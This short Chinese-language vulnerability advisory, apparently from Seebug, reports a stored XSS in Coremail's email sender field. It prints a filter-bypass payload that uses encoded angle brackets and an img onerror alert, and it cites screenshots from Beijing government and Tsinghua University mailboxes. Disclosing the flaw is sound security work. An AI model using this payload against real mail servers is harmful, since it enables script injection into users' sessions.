coremail某处持久xss指哪打哪

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 邮件发信人处未过滤特殊字符 ### 详细说明: ``` ]));123"' /span><=\u003c\u003e;<img src=x onerror='alert(123)'/>\u003c\u003e=>x@x.gov.cn ``` x@x.gov.cn 是真正发信邮箱,前面的代码已经经过编码过了。虽然开发将<>标签过滤了,但是还是有办法让“<”这个标签存在。 ### 漏洞证明: 北京市公务员邮箱: [<img src="https://images.seebug.org/upload/201508/13232447298d38adf9fa3d13125db94b7c4f13d6.jpg" alt="12.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/13232447298d38adf9fa3d13125db94b7c4f13d6.jpg) 清华大学邮箱: [<img src="https://images.seebug.org/upload/201508/13232457d3b5f511ca4d2682c42f29c93cda86be.jpg" alt="222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/13232457d3b5f511ca4d2682c42f29c93cda86be.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息